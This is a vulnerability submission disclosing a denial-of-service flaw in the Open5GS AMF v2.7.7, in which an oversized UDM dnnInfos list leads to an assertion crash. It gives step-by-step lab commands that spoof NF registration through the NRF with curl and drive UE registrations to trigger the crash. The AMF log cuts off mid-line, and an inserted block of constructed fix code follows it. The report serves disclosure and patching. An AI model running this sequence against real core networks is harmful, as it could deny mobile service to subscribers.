Submit #804337: Open5gs AMF v2.7.7 Denial of Service

Title: Open5gs AMF v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

AMF can be driven into a later assertion abort when a malicious UDM returns an oversized `dnnInfos` list in:

```text
GET /nudm-sdm/v2/{supi}/smf-select-data
```

The import path in `amf_nudm_sdm_handle_provisioned()` copies each `DnnInfoList` entry into:

```c
ogs_session_t *session = &slice->session[slice->num_of_session];
session->name = ogs_strdup(DnnInfo->dnn);
slice->num_of_session++;
```

at `../src/amf/nudm-handler.c:219-230` with no bound check against `OGS_MAX_NUM_OF_SESS == 4`. That means a valid but oversized UDM response can push `amf_ue->slice[i].num_of_session` far past the fixed per-slice session array limit.

The corrupted imported state later aborts as soon as AMF cleanup reaches `amf_clear_subscribed_info()`:

```c
ogs_assert(amf_ue->slice[i].num_of_session <= OGS_MAX_NUM_OF_SESS);
```

at `../src/amf/context.c:2763`.

This is distinct from the already documented AMF reports. It is not the existing `NNRF smfInfo.dnnSmfInfoList` crash family, and it is not the earlier live `smf-select-data` experiment that only showed `Ignore max session count overflow` later in `gmm-handler.c`. The root cause here is the unbounded import in `nudm-handler.c` and the later cleanup-time assertion in `context.c`.

### Root Cause

- Entry chain: UE registration -> AMF `GET /nudm-sdm/v2/{supi}/smf-select-data` -> `amf_nudm_sdm_handle_provisioned()` -> unbounded `slice->session[slice->num_of_session]` writes -> later `amf_clear_subscribed_info()`
- Crash site: `../src/amf/context.c:2763`
- Root cause family: unbounded imported list length causing later cleanup-time assertion
- Controlling field: `SmfSelectionSubscriptionData.subscribedSnssaiInfos[*].dnnInfos[*]`

### Steps to Reproduce

1. Start the Open5GS Docker lab and ensure these containers are running:

   ```bash
   docker start db ausf udm udr pcf smf upf amf nssf
   ```

2. Confirm the subscriber exists in MongoDB. In my live run, the existing test subscriber was:

   ```text
   IMSI: 001011234567891
   ```

3. Start the fake UDM helper in the same `open5gs` Docker network. In my live run on 2026-04-12 the fake UDM container IP was `10.33.33.13`:

   ```bash
   docker run -d --name amf-fake-udm --network open5gs \
     -v /home/ubuntu/open5gs_277/.audit_tmp:/work \
     node:20-alpine sh -lc '
   IP=$(hostname -i | awk "{print \$1}")
   export AMF_FAKE_UDM_HOST_IP=$IP AMF_FAKE_UDM_PORT=18083
   export AMF_FAKE_UDM_MODE_FILE=/work/amf_fake_udm.mode
   export AMF_FAKE_UDM_LOG_FILE=/work/amf_fake_udm.log
   node /work/amf_fake_udm.js'
   ```

4. Control experiment: fresh AMF, replace the AMF-local real UDM entry with the fake UDM, then perform one normal UE registration:

   ```bash
   docker rm -f amf-audit-gnb amf-audit-ue || true
   docker restart amf
   curl --http2-prior-knowledge -sS -i -m 8 \
     -X POST http://10.33.33.5/nnrf-nfm/v1/nf-status-notify \
     -H 'content-type: application/json' \
     --data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/28259240-367f-41f1-862a-81de7e8f7ca7"}'
   curl --http2-prior-knowledge -sS -i -m 8 \
     -X POST http://10.33.33.5/nnrf-nfm/v1/nf-status-notify \
     -H 'content-type: application/json' \
     --data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.13:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.13"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
   printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
   docker run --rm -d --name amf-audit-gnb --network open5gs \
     --network-alias gnb.ueransim.org \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
   docker run --rm -d --name amf-audit-ue --network open5gs \
     --network-alias ue.ueransim.org \
     --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
   ```

5. Malicious experiment: fresh AMF again, replace the AMF-local real UDM entry with the fake UDM, then use `smf-select-dnn-overflow` for two consecutive UE registrations:

   ```bash
   docker rm -f amf-audit-gnb amf-audit-ue || true
   docker restart amf
   curl --http2-prior-knowledge -sS -i -m 8 \
     -X POST http://10.33.33.5/nnrf-nfm/v1/nf-status-notify \
     -H 'content-type: application/json' \
     --data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/28259240-367f-41f1-862a-81de7e8f7ca7"}'
   curl --http2-prior-knowledge -sS -i -m 8 \
     -X POST http://10.33.33.5/nnrf-nfm/v1/nf-status-notify \
     -H 'content-type: application/json' \
     --data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.13:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.13"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
   printf 'smf-select-dnn-overflow\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
   docker run --rm -d --name amf-audit-gnb --network open5gs \
     --network-alias gnb.ueransim.org \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
   docker run --rm -d --name amf-audit-ue --network open5gs \
     --network-alias ue.ueransim.org \
     --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
   # Wait for the first registration to finish and plant the oversized session list,
   # then restart gNB/UE once more to trigger the later cleanup-time assertion.
   docker rm -f amf-audit-gnb amf-audit-ue || true
   docker run --rm -d --name amf-audit-gnb --network open5gs \
     --network-alias gnb.ueransim.org \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
   docker run --rm -d --name amf-audit-ue --network open5gs \
     --network-alias ue.ueransim.org \
     --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
   docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
   docker logs --tail 50 amf
   ```

### Logs

Control UE result:

```text
Initial Registration is successful
PDU Session establishment is successful PSI[1]
running 0
```

Malicious AMF logs:

```text
04/12 15:02:24.574: [sbi] INFO: [46046808-3644-41f1-8634-1158ac178bc2] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81)
04/12 15:02:24.574: [sbi] INFO: [NSSF] NFInstance associated [46046808-3644-41f1-8634-1158ac178bc2] (../lib/sbi/context.c:2441)
04/12 15:02:24.574: [sbi] INFO: Setup NF EndPoint(fqdn) [nssf.open5gs.org:0] (../lib/sbi/context.c:2446)
04/12 15:02:24.574: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.9:80] (../lib/sbi/context.c:2446)
04/12 15:02:24.574: [sbi] INFO: [nnssf-nsselection] NFService associated [460520a4-3644-41f1-8634-1158ac178bc2] (../lib/sbi/context.c:2109)
04/12 15:02:24.574: [sbi] INFO: Setup NF EndPoint(fqdn) [nssf.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 15:02:24.574: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.9:80] (../lib/sbi/context.c:2111)
04/12 15:02:24.575: [sbi] INFO: [5ac5b314-3644-41f1-b7b4-21a7b4c43293] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81)
04/12 15:02:24.575: [sbi] INFO
```
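The import loop from the Root Cause section above, rewritten with the bound check the report says is missing, as an added example that is not Open5GS code: `model_slice_t`, `model_session_t`, `import_dnn_infos()` and `clear_slice()` are constructed stand-ins that assume only what the report states (a fixed per-slice array of `OGS_MAX_NUM_OF_SESS == 4` sessions and a `num_of_session` counter that cleanup later asserts on).

```c
#define _POSIX_C_SOURCE 200809L     /* for strdup() */
#include <stdlib.h>
#include <string.h>

/* Constructed model of the per-slice session array from the report; the real
 * Open5GS structs differ, but OGS_MAX_NUM_OF_SESS is 4 as the report states. */
#define OGS_MAX_NUM_OF_SESS 4

typedef struct {
    char *name;                     /* heap-allocated copy of the DNN name */
} model_session_t;

typedef struct {
    model_session_t session[OGS_MAX_NUM_OF_SESS];
    int num_of_session;
} model_slice_t;

/* Hardened import of a dnnInfos list. The reported loop writes
 * slice->session[slice->num_of_session] for every entry with no bound check;
 * here entries past OGS_MAX_NUM_OF_SESS are dropped (and counted) instead, so
 * num_of_session <= OGS_MAX_NUM_OF_SESS still holds when cleanup later runs.
 * Returns the number of dropped entries, or -1 on allocation failure. */
int import_dnn_infos(model_slice_t *slice, const char *const *dnns, size_t count)
{
    int dropped = 0;
    for (size_t i = 0; i < count; i++) {
        if (slice->num_of_session >= OGS_MAX_NUM_OF_SESS) {
            dropped++;              /* the check missing in nudm-handler.c */
            continue;
        }
        model_session_t *session = &slice->session[slice->num_of_session];
        session->name = strdup(dnns[i]);
        if (session->name == NULL) return -1;
        slice->num_of_session++;
    }
    return dropped;
}

/* Cleanup counterpart: frees the imported names; returns -1 instead of
 * aborting if the invariant that context.c asserts has already been broken. */
int clear_slice(model_slice_t *slice)
{
    if (slice->num_of_session > OGS_MAX_NUM_OF_SESS) return -1;
    for (int i = 0; i < slice->num_of_session; i++) {
        free(slice->session[i].name);
        slice->session[i].name = NULL;
    }
    slice->num_of_session = 0;
    return 0;
}
```

A non-zero dropped count is the signal a caller would log and use to reject the UDM response, rather than carrying the excess into later state.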
Source: https://github.com/open5gs/open5gs/issues/4406
User: ZiyuLin (UID 93568)
Submission: 14/04/2026 11:42 (2 months ago)
Moderated: 01/05/2026 11:25 (17 days later)
Status: Duplicate
VulDB Entry: 360533 [Open5GS up to 2.7.7 AMF /src/amf/nudm-handler.c amf_nudm_sdm_handle_provisioned denial of service]
Points: 0
